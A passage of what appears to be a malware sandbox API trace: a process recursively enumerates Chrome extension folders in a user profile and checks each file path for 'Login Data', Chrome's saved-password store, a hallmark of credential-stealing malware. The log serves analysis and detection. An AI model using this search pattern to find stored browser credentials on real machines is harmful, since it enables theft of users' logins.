ftLastWriteTime.dwLowDateTime=0xfe051a00, ftLastWriteTime.dwHighDateTime=0x1d03f5d, nFileSizeHigh=0x0, nFileSizeLow=0x2b56, dwReserved0=0x69006c, dwReserved1=0x690065, cFileName="verified_contents.json", cAlternateFileName="VERIFI~1.JSO")) returned 0 [0161.819] FindClose (in: hFindFile=0x8f9bc0 | out: hFindFile=0x8f9bc0) returned 1 [0161.819] FindNextFileW (in: hFindFile=0x8f9b80, lpFindFileData=0x2debf0 | out: lpFindFileData=0x2debf0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x867288b0, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x8687f510, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x8687f510, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="_metadata", cAlternateFileName="_METAD~1")) returned 0 [0161.819] FindClose (in: hFindFile=0x8f9b80 | out: hFindFile=0x8f9b80) returned 1 [0161.819] FindNextFileW (in: hFindFile=0x8f9b40, lpFindFileData=0x2dee68 | out: lpFindFileData=0x2dee68*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x864c72b0, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x86833250, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x86833250, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="0.9_0", cAlternateFileName="")) returned 0 [0161.819] FindClose (in: hFindFile=0x8f9b40 | out: hFindFile=0x8f9b40) returned 1 [0161.819] FindNextFileW (in: hFindFile=0x8f9b00, lpFindFileData=0x2df0e0 | out: lpFindFileData=0x2df0e0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x819d0bd0, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x916d8210, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x916d8210, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="apdfllckaahabafndbhieahigkjlhalf", cAlternateFileName="APDFLL~1")) returned 1 [0161.819] lstrcmpiW (lpString1="apdfllckaahabafndbhieahigkjlhalf", lpString2=".") returned 1 [0161.819] lstrcmpiW (lpString1="apdfllckaahabafndbhieahigkjlhalf", lpString2="..") returned 1 [0161.819] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions") returned 86 [0161.820] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0161.820] FindNextFileW (in: hFindFile=0x8f9b40, lpFindFileData=0x2dee68 | out: lpFindFileData=0x2dee68*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x819d0bd0, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x916d8210, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x916d8210, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0161.820] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0161.820] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0161.820] FindNextFileW (in: hFindFile=0x8f9b40, lpFindFileData=0x2dee68 | out: lpFindFileData=0x2dee68*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x86e26950, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x871928f0, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x871928f0, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="14.1_0", cAlternateFileName="")) returned 1 [0161.820] lstrcmpiW (lpString1="14.1_0", lpString2=".") returned 1 [0161.820] lstrcmpiW (lpString1="14.1_0", lpString2="..") returned 1 [0161.820] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf") returned 119 [0161.822] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0161.822] FindNextFileW (in: hFindFile=0x8f9b80, lpFindFileData=0x2debf0 | out: lpFindFileData=0x2debf0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x86e26950, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x871928f0, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x871928f0, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0161.822] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0161.822] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0161.822] FindNextFileW (in: hFindFile=0x8f9b80, lpFindFileData=0x2debf0 | out: lpFindFileData=0x2debf0*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x86e26950, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x871928f0, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x871928f0, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x1a33, dwReserved0=0x0, dwReserved1=0x0, cFileName="128.png", cAlternateFileName="")) returned 1 [0161.822] StrStrIW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\128.png", lpSrch="Login Data") returned 0x0 [0161.822] FindNextFileW (in: hFindFile=0x8f9b80, lpFindFileData=0x2debf0 | out: lpFindFileData=0x2debf0*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x86e26950, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x87016300, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x8716c790, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x3ec, dwReserved0=0x0, dwReserved1=0x0, cFileName="manifest.json", cAlternateFileName="MANIFE~1.JSO")) returned 1 [0161.822] StrStrIW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\manifest.json", lpSrch="Login Data") returned 0x0 [0161.822] FindNextFileW (in: hFindFile=0x8f9b80, lpFindFileData=0x2debf0 | out: lpFindFileData=0x2debf0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x86e26950, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x86fef9d0, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x86fef9d0, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="_locales", cAlternateFileName="")) returned 1 [0161.822] lstrcmpiW (lpString1="_locales", lpString2=".") returned 1 [0161.822] lstrcmpiW (lpString1="_locales", lpString2="..") returned 1 [0161.822] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0") returned 126 [0161.824] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0161.824] FindNextFileW (in: hFindFile=0x8f9bc0, lpFindFileData=0x2de978 | out: lpFindFileData=0x2de978*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x86e26950, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x86fef9d0, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x86fef9d0, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x680061, dwReserved1=0x620061, cFileName="..", cAlternateFileName="")) returned 1 [0161.824] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0161.824] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0161.824] FindNextFileW (in: hFindFile=0x8f9bc0, lpFindFileData=0x2de978 | out: lpFindFileData=0x2de978*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x86e4cab0, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x86e4cab0, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x86e4cab0, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x680061, dwReserved1=0x620061, cFileName="ar", cAlternateFileName="")) returned 1 [0161.824] lstrcmpiW (lpString1="ar", lpString2=".") returned 1 [0161.824] lstrcmpiW (lpString1="ar", lpString2="..") returned 1 [0161.824] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales") returned 135 [0161.825] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0161.825] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0161.825] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0161.825] StrStrIW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\ar\\messages.json", lpSrch="Login Data") returned 0x0 [0161.825] lstrcmpiW (lpString1="bg", lpString2=".") returned 1 [0161.825] lstrcmpiW (lpString1="bg", lpString2="..") returned 1 [0161.825] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales") returned 135 [0161.826] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0161.826] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0161.826] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0161.826] StrStrIW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\bg\\messages.json", lpSrch="Login Data") returned 0x0 [0161.826] lstrcmpiW (lpString1="ca", lpString2=".") returned 1 [0161.826] lstrcmpiW (lpString1="ca", lpString2="..") returned 1 [0161.826] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales") returned 135 [0161.826] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0161.826] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0161.826] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0161.827] StrStrIW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\ca\\messages.json", lpSrch="Login Data") returned 0x0 [0161.827] lstrcmpiW (lpString1="cs", lpString2=".") returned 1 [0161.827] lstrcmpiW (lpString1="cs", lpString2="..") returned 1 [0161.827] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales") returned 135 [0161.827] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0161.828] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0161.828] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0161.828] StrStrIW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\cs\\messages.json", lpSrch="Login Data") returned 0x0 [0161.828] lstrcmpiW (lpString1="da", lpString2=".") returned 1 [0161.828] lstrcmpiW (lpString1="da", lpString2="..") returned 1 [0161.828] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales") returned 135 [0161.828] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0161.828] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0161.828] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0161.828] StrStrIW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\da\\messages.json", lpSrch="Login Data") returned 0x0 [0161.828] lstrcmpiW (lpString1="de", lpString2=".") returned 1 [0161.828] lstrcmpiW (lpString1="de", lpString2="..") returned 1 [0161.828] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales") returned 135 [0161.831] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0161.831] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0161.831] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0161.831] StrStrIW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\de\\messages.json", lpSrch="Login Data") returned 0x0 [0161.831] lstrcmpiW (lpString1="el", lpString2=".") returned 1 [0161.831] lstrcmpiW (lpString1="el", lpString2="..") returned 1 [0161.831] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales") returned 135 [0161.831] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0161.832] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0161.832] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0161.832] StrStrIW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\el\\messages.json", lpSrch="Login Data") returned 0x0 [0161.834] lstrcmpiW (lpString1="en_GB", lpString2=".") returned 1 [0161.834] lstrcmpiW (lpString1="en_GB", lpString2="..") returned 1 [0161.834] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales") returned 135 [0161.834] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0161.834] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0161.834] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0161.835] StrStrIW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\en_GB\\messages.json", lpSrch="Login Data") returned 0x0 [0161.835] lstrcmpiW (lpString1="en_US", lpString2=".") returned 1 [0161.835] lstrcmpiW (lpString1="en_US", lpString2="..") returned 1 [0161.835] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales") returned 135 [0161.835] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0161.835] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0161.835] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0161.835] StrStrIW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\en_US\\messages.json", lpSrch="Login Data") returned 0x0 [0161.835] lstrcmpiW (lpString1="es", lpString2=".") returned 1 [0161.835] lstrcmpiW (lpString1="es", lpString2="..") returned 1 [0161.835] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales") returned 135 [0161.836] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0161.836] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0161.836] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0161.836] StrStrIW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\es\\messages.json", lpSrch="Login Data") returned 0x0 [0161.836] lstrcmpiW (lpString1="es_419", lpString2=".") returned 1 [0161.836] lstrcmpiW (lpString1="es_419", lpString2="..") returned 1 [0161.836] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales") returned 135 [0161.836] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0161.836] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0161.836] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0161.836] StrStrIW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\es_419\\messages.json", lpSrch="Login Data") returned 0x0 [0161.837] lstrcmpiW (lpString1="et", lpString2=".") returned 1 [0161.837] lstrcmpiW (lpString1="et", lpString2="..") returned 1 [0161.837] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales") returned 135 [0161.837] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0161.837] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0161.837] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0161.837] StrStrIW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\et\\messages.json", lpSrch="Login Data") returned 0x0 [0161.838] lstrcmpiW (lpString1="eu", lpString2=".") returned 1 [0161.838] lstrcmpiW (lpString1="eu", lpString2="..") returned 1 [0161.838] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales") returned 135 [0161.838] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0161.838] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0161.838] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0161.838] StrStrIW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\eu\\messages.json", lpSrch="Login Data") returned 0x0 [0161.838] lstrcmpiW (lpString1="fi", lpString2=".") returned 1 [0161.838] lstrcmpiW (lpString1="fi", lpString2="..") returned 1 [0161.838] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales") returned 135 [0161.839] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0161.839] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0161.839] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0161.839] StrStrIW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\fi\\messages.json", lpSrch="Login Data") returned 0x0 [0161.839] lstrcmpiW (lpString1="fil", lpString2=".") returned 1 [0161.839] lstrcmpiW (lpString1="fil", lpString2="..") returned 1 [0161.839] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales") returned 135 [0161.839] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0161.839] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0161.839] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0161.839] StrStrIW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\fil\\messages.json", lpSrch="Login Data") returned 0x0 [0161.840] lstrcmpiW (lpString1="fr", lpString2=".") returned 1 [0161.840] lstrcmpiW (lpString1="fr", lpString2="..") returned 1 [0161.840] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales") returned 135 [0161.840] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0161.840] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0161.840] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0161.840] StrStrIW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\fr\\messages.json", lpSrch="Login Data") returned 0x0 [0161.840] lstrcmpiW (lpString1="he", lpString2=".") returned 1 [0161.841] lstrcmpiW (lpString1="he", lpString2="..") returned 1 [0161.841] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales") returned 135 [0161.841] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0161.841] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0161.841] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0161.841] StrStrIW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\he\\messages.json", lpSrch="Login Data") returned 0x0 [0161.841] lstrcmpiW (lpString1="hi", lpString2=".") returned 1 [0161.841] lstrcmpiW (lpString1="hi", lpString2="..") returned 1 [0161.841] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales") returned 135 [0161.842] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0161.842] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0161.842] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0161.842] StrStrIW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\hi\\messages.json", lpSrch="Login Data") returned 0x0 [0161.842] lstrcmpiW (lpString1="hr", lpString2=".") returned 1 [0161.842] lstrcmpiW (lpString1="hr", lpString2="..") returned 1 [0161.842] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales") returned 135 [0161.842] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0161.842] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0161.842] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0161.842] StrStrIW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\hr\\messages.json", lpSrch="Login Data") returned 0x0 [0161.842] lstrcmpiW (lpString1="hu", lpString2=".") returned 1 [0161.842] lstrcmpiW (lpString1="hu", lpString2="..") returned 1 [0161.842] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales") returned 135 [0161.868] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0161.868] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0161.868] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0161.868] StrStrIW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\hu\\messages.json", lpSrch="Login Data") returned 0x0 [0161.868] lstrcmpiW (lpString1="id", lpString2=".") returned 1 [0161.868] lstrcmpiW (lpString1="id", lpString2="..") returned 1 [0161.868] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales") returned 135 [0161.868] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0161.868] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0161.869] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0161.869] StrStrIW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\id\\messages.json", lpSrch="Login Data") returned 0x0 [0161.869] lstrcmpiW (lpString1="it", lpString2=".") returned 1 [0161.869] lstrcmpiW (lpString1="it", lpString2="..") returned 1 [0161.869] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales") returned 135 [0161.871] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0161.871] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0161.871] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0161.871] StrStrIW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\it\\messages.json", lpSrch="Login Data") returned 0x0 [0161.871] StrStrIW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\ja\\messages.json", lpSrch="Login Data") returned 0x0 [0161.873] StrStrIW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\ko\\messages.json", lpSrch="Login Data") returned 0x0 [0161.873] StrStrIW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\lt\\messages.json", lpSrch="Login Data") returned 0x0 [0161.874] StrStrIW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User 